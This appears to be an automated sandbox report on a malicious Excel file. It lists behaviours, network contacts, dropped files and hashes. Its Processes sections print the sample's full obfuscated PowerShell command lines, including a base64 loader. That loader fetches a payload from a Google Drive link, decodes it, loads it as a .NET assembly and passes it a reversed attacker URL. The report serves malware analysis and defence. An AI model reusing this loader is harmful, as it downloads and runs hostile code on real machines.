Malware Analysis Report

2025-08-05 11:48

Sample ID 241031-eh7mzazcrl
Target dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls
SHA256 dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1
Tags: defense_evasion discovery execution
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1

Threat Level: Known bad

The file dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported: 2024-10-31 03:59

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-31 03:57
Reported: 2024-10-31 04:03
Platform: win10v2004-20241007-en
Max time kernel: 143s
Max time network: 152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls"

Signatures

Process spawned unexpected child process

| Description | Indicator | Process | Target |
|---|---|---|---|
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |

Checks processor information in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |

Enumerates system info in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |

Suspicious behavior: AddClipboardFormatListener

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1124 wrote to memory of 4684 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 1124 wrote to memory of 4684 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |

Uses Task Scheduler COM API (persistence)

Uses Volume Shadow Copy WMI provider (ransomware)

Uses Volume Shadow Copy service COM API (ransomware)

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 acesso.run udp
US 104.21.74.191:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 191.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 151.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 c386a4aeddf5542940414e51d5ece19b
SHA1 7aa4d73f562babd3a961a96d85c91b665f8201a0
SHA256 ae7ea7dda9e19012cfc58ff846522a03f13ea9c56a0761809ae09f4c850430f7
SHA512 2b88a5f1c67bfbe34c4aa16488eef91555be4274b4c5c70641be9b2b424d1483922beeea4040154ddd3452147de6928ef04063a03798a5d0442319adc2e92144

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-31 03:57
Reported: 2024-10-31 04:03
Platform: win7-20240903-en
Max time kernel: 119s
Max time network: 122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls

Signatures

Command and Scripting Interpreter: PowerShell (execution)

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Evasion via Device Credential Deployment (defense_evasion execution)

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Legitimate hosting services abused for malware hosting/C2

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |

Drops file in System32 directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Enumerates physical storage devices

System Location Discovery: System Language Discovery (discovery)

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |

Enumerates system info in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |

Modifies Internet Explorer settings (adware spyware)

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |

Suspicious behavior: AddClipboardFormatListener

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1404 wrote to memory of 2896 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE |
| PID 1404 wrote to memory of 2896 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE |
| PID 1404 wrote to memory of 2896 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE |
| PID 1404 wrote to memory of 2896 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE |
| PID 2896 wrote to memory of 2404 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2896 wrote to memory of 2404 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2896 wrote to memory of 2404 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2896 wrote to memory of 2404 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2896 wrote to memory of 1888 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe |
| PID 2896 wrote to memory of 1888 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe |
| PID 2896 wrote to memory of 1888 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe |
| PID 2896 wrote to memory of 1888 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe |
| PID 1888 wrote to memory of 692 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe |
| PID 1888 wrote to memory of 692 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe |
| PID 1888 wrote to memory of 692 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe |
| PID 1888 wrote to memory of 692 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe |
| PID 2896 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WScript.exe |
| PID 2896 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WScript.exe |
| PID 2896 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WScript.exe |
| PID 2896 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE | C:\Windows\SysWOW64\WScript.exe |
| PID 1848 wrote to memory of 2904 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 2904 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 2904 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 2904 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2904 wrote to memory of 2304 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2904 wrote to memory of 2304 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2904 wrote to memory of 2304 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2904 wrote to memory of 2304 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE

"C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'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'+[cHar]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hhes_v5z.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF845.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF844.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERics
J3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 acesso.run udp
US 104.21.74.191:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 104.21.74.191:443 acesso.run tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 f9ac9f5a44d5bc7fe061af5181896c6e
SHA1 0f5257245a9274c710edb77217e5d7e99fee6c17
SHA256 110a34e78c5b8db16f1f5357d33854fdc604f54011d39a119b3e1707644af714
SHA512 934f31fe40c2ff8bc8fc6b266639bc91cb7eefaebee76490e38e596a3547b0fb87674347c78041ce5d43cd27fc32f98f76dc15a0d270237cea9bad279a6d6c9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aad049801fbc889aafffe3b3eb96f85b
SHA1 ea931845bb062eb907d3354a4d09871b287a5d22
SHA256 035486c4c9a996e8d550142286d4eb95124af425bf55b9f3e4f19229ca1ee6e0
SHA512 336bda1bae16e90d360b3f2697817f9835da95e0a139243c51a01494061173a8f41a15067a2bfe83b93aa6bdfcc3748dd49423ab989908a3c635135954c67d4d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 e5f70e063a29b63a57fd63f1682245d8
SHA1 922ec2b51319fb35134cce1e8188b56cd0937d41
SHA256 d95db9305cc94e8760a784c46b6a40aa5a5352f0d6f16ca536471da124de2726
SHA512 132d4e5c471d7030b1367741eb2ff856f86a42cdcbfe6ed0cc26e7e65e78a6b94ae722e0091127f8fb56705f334fd97bb9d8d8185f38fd164ef3195975eae240

C:\Users\Admin\AppData\Local\Temp\CabEE64.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\creatednewthingsformee[1].hta

MD5 6e717304324c95149d224a71e675b0a3
SHA1 204dc0fa81a68b0244a46ef0ed1f12389bcc2c65
SHA256 5f0a2146432d26f3c4b439f1be2a857b4af1ac5a601b135c00bc8a545374ac4d
SHA512 d03aea131d144f7e5328f69acc4a28f59ba182fccc3bc7292acc16ff4b886b7e61592d6931915742406f686a484445d00a0e8900bee24d541cf99a5b3d0245db

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 9b9fa7732759343724fbc283172bd021
